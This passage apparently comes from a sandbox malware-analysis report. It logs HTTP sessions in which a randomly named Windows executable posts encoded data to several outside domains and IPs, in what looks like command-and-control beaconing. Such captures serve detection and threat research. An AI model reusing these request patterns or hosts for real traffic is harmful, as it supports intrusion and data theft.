                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.sonoscan.org
                                                                                                                                  Origin: http://www.sonoscan.org
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.sonoscan.org/ew98/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 50023 | 13.248.169.48 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:54:03.430110931 CET | 334 | OUT | GET /ew98/?NBfdCRyH=DRp8qVXu3DttXwS8YKhwd1fMqknFSvhogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpjUHvWcUntSXj4XGnqR7Id1KBxF+AplNn3Lg=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.sonoscan.org
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Nov 7, 2024 12:54:04.087508917 CET | 404 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:04 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 264
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NBfdCRyH=DRp8qVXu3DttXwS8YKhwd1fMqknFSvhogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpjUHvWcUntSXj4XGnqR7Id1KBxF+AplNn3Lg=&ZpEH9=TjSP5LXXbN8d4"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 50024 | 38.47.232.194 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:54:09.993041039 CET | 585 | OUT | POST /45n6/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.zz67x.top
                                                                                                                                  Origin: http://www.zz67x.top
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.zz67x.top/45n6/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=Qh7ByWH27Ea7UlRhS/KEa9mVIzRp6fb5x4Q6McX5q4gX6xC2T0HtZVq0ah/YMaly94dKe4E+p/LrRALrNyQLs1BArA4Yzl3YeHOiIEH4qxeQM8KZavfPuaj4SR9sXrtbTWbVdx/eLhiqixCBGb3R37iavX4vqRDLcIzzPUgFno3huiJYXlYXm3MECpGOqE7npg==
Nov 7, 2024 12:54:10.896868944 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:10 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 146
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  18 | 192.168.2.4 | 50025 | 38.47.232.194 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:54:12.552975893 CET | 605 | OUT | POST /45n6/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.zz67x.top
                                                                                                                                  Origin: http://www.zz67x.top
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.zz67x.top/45n6/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=Qh7ByWH27Ea7VEhhXciEbdmWETRpvvb1x5s6MdSktMMX/ja2VArteVq0DR/ZIal594hCe6Q+p/PrRAbrNFMItlBewQ4arF3YeHOiIEivqxGQMM6ZaOfMwKj5ax9sTrtfTWbndwi7LlSqiwyBHK3W57iArX5b6zqGG5GoOFgFkZz2mEECGU5A03o3fuP6nHGuyv/8I74ZKYWJ5H5mDs3jih8=
                                                                                                                                  Nov 7, 2024 12:54:13.487097025 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:13 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 146
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  19 | 192.168.2.4 | 50026 | 38.47.232.194 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:54:15.101788044 CET | 10687 | OUT | POST /45n6/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.zz67x.top
                                                                                                                                  Origin: http://www.zz67x.top
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.zz67x.top/45n6/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:54:16.066637993 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:15 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 146
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  20 | 192.168.2.4 | 50027 | 38.47.232.194 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:54:17.642848015 CET | 331 | OUT | GET /45n6/?ZpEH9=TjSP5LXXbN8d4&NBfdCRyH=djThxhCXsVTaW29XXtOrXv7xIwJyr9fT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYygTJ2xilMgHX7dTLMRFf+/COIbLTgBfvWu/E= HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.zz67x.top
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:54:18.611845016 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:18 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 146
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  21 | 192.168.2.4 | 50028 | 167.172.133.32 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:54:23.836679935 CET | 600 | OUT | POST /jlqg/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.omnibizlux.biz
                                                                                                                                  Origin: http://www.omnibizlux.biz
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.omnibizlux.biz/jlqg/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=xbYOED3XuvIwe8AZfGfonhZcC4k4T9sJ34VEgAVQ/XqydcVjoKRgErFp1/Shb7hJPJTBhh+/VAcmq1FClbNwt6+VpGHVWvzrSYE7NDoCnCw7swpZchpEkzwagwzLCVkpIraM61y/t1Z9HgxkoBsK/ufWt7vQ4G+hqfIdj/Rjb3WV0QJhAoFapHa8HT/oSstkUg==
                                                                                                                                  Nov 7, 2024 12:54:24.490442991 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.26.1
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:24 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Content-Encoding: gzip


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  22 | 192.168.2.4 | 50029 | 167.172.133.32 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:54:26.385613918 CET | 620 | OUT | POST /jlqg/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.omnibizlux.biz
                                                                                                                                  Origin: http://www.omnibizlux.biz
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.omnibizlux.biz/jlqg/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=xbYOED3XuvIwfZQZZlHohBZbJYk4adsN34JEgDZ+/FOyc9ljpOlgHrFp9fSkUbh4PIvJhhS/VEMmq1VCkpl3iK+timHbSvzrSYE7NAUsnC47sgZZdDBDqTwZtgzLGVluIrbb60uGt2h9Hk1koQsLkefUwruVw1fYgvRmr5ZjW3KT42E7RZkN7H+PaU2cfvQtPnaLe/v2Wmrx6XNbPbUKQVA=
                                                                                                                                  Nov 7, 2024 12:54:27.045749903 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.26.1
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:26 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Content-Encoding: gzip


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  23 | 192.168.2.4 | 50030 | 167.172.133.32 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:54:29.017657042 CET | 10702 | OUT | POST /jlqg/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.omnibizlux.biz
                                                                                                                                  Origin: http://www.omnibizlux.biz
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.omnibizlux.biz/jlqg/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Nov 7, 2024 12:54:29.615838051 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.26.1
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:29 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 50031 | 167.172.133.32 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:54:31.558881044 CET | 336 | OUT | GET /jlqg/?NBfdCRyH=8ZwuH3XLrsgkZOwzbHv8kzwaBJUvbtMyt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1siN23r0fyWsL1d4E8Hi4h+DwdtH5CMx58j2c=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.omnibizlux.biz
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Nov 7, 2024 12:54:32.226411104 CET | 303 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.26.1
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:32 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 153
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 50032 | 162.0.211.143 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:54:37.375785112 CET | 591 | OUT | POST /4xim/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.vibixx.site
                                                                                                                                  Origin: http://www.vibixx.site
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.vibixx.site/4xim/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Nov 7, 2024 12:54:38.040174007 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:37 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Content-Length: 389
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 50033 | 162.0.211.143 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:54:39.916384935 CET | 611 | OUT | POST /4xim/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.vibixx.site
                                                                                                                                  Origin: http://www.vibixx.site
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.vibixx.site/4xim/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 50034 | 162.0.211.143 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:54:42.461678028 CET | 10693 | OUT | POST /4xim/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.vibixx.site
                                                                                                                                  Origin: http://www.vibixx.site
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.vibixx.site/4xim/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Nov 7, 2024 12:54:43.143553019 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:43 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Content-Length: 389
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 50035 | 162.0.211.143 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:54:45.132808924 CET | 333 | OUT | GET /4xim/?NBfdCRyH=0a8PLTuVJQjPSrlNTcujtDihNMeO9FYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP27bmOOo50KzsRrW97hoYkm0aU0/aEWOIRhrI=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.vibixx.site
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Nov 7, 2024 12:54:45.805418015 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:45 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Content-Length: 389
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 50036 | 162.241.85.94 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:54:59.451555967 CET | 603 | OUT | POST /pgru/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.papampalli.shop
                                                                                                                                  Origin: http://www.papampalli.shop
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.papampalli.shop/pgru/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Nov 7, 2024 12:55:00.338534117 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:00 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                  Link: <https://papampalli.shop/wp-json/>; rel="https://api.w.org/"
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Content-Length: 15115
                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  30 | 192.168.2.4 | 50037 | 162.241.85.94 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:55:01.991162062 CET | 623 | OUT | POST /pgru/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.papampalli.shop
                                                                                                                                  Origin: http://www.papampalli.shop
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.papampalli.shop/pgru/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=xybPKJFvyA2MbtFUOheg8Iz0k3cM2F3TAWC/kZHHcyPLqUH3lOcNTZE4dJogDJHjaUAhtC9oyj9mBPYBShAoINwBwgn8wYN9GhaJts7CiZFrcst+UNQYvYglDhVU8aTdayMPhRo7yDUdcrmXY2XbWfRGI5dOVkYCwm8SUcyQ5C6zM0FshNkBpfRKF7XOthuLR2SVobWD5omfJf9mDrorlZA=
                                                                                                                                  Nov 7, 2024 12:55:02.866318941 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:02 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                  Link: <https://papampalli.shop/wp-json/>; rel="https://api.w.org/"
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Content-Length: 15115
                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  31 | 192.168.2.4 | 50038 | 162.241.85.94 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:55:04.539241076 CET | 10705 | OUT | POST /pgru/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.papampalli.shop
                                                                                                                                  Origin: http://www.papampalli.shop
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.papampalli.shop/pgru/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:55:05.440449953 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:05 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                  Link: <https://papampalli.shop/wp-json/>; rel="https://api.w.org/"
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Content-Length: 15115
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Nov 7, 2024 12:55:05.440685987 CET1236INData Raw: 35 12 cc 27 d2 40 3e d6 d8 84 2b 91 ea b9 11 09 49 3f c0 3a 98 55 17 20 53 9e fd 8e 72 7f 6e 78 58 12 6d e6 53 56 b7 f9 d0 ef 96 92 e0 c7 44 50 0e f5 1a 2f 19 d1 c6 a2 75 77 77 d7 dc fe 94 3f 63 31 a3 bb ac 00 2b 14 e0 3c aa aa 06 d4 13 fc 38 be
                                                                                                                                  Data Ascii: 5'@>+I?:U SrnxXmSVDP/uww?c1+<8(|&|DM=.PH1tAaj<s]&`l#<sokFCyRyyEjq(u]"~.=E#aIN%8qD`~>
                                                                                                                                  Nov 7, 2024 12:55:05.440691948 CET636INData Raw: 45 73 1f ba 60 10 86 86 b6 1d ab da 3a 53 74 2d e3 a9 f5 26 26 3e c5 a8 1d e3 8d 59 8d 73 3f 9e 24 9b 0e c2 dc 87 30 2c b5 9f d2 81 70 76 f3 52 23 58 aa 11 7f 64 db 1f 01 34 eb 15 da d6 fd 75 f4 2c 8c b4 73 4c 83 72 46 b3 d9 f0 e4 9f 8e 3d 9a d4
                                                                                                                                  Data Ascii: Es`:St-&&>Ys?$0,pvR#Xd4u,sLrF=VEjy>F}};}{Fri~U,`@5]i$rjmgFvXg*t_F~m]tdFE&_d]p'8'd4D
